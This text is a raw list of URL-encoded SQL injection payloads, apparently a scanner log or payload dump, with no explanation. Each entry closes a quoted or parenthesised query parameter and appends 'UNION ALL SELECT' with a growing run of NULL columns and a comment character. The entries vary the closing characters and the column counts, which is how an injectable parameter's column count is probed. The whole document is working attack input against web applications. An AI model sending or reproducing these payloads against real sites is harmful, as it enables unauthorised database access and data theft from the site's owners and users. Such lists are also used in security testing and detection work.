1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%25%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 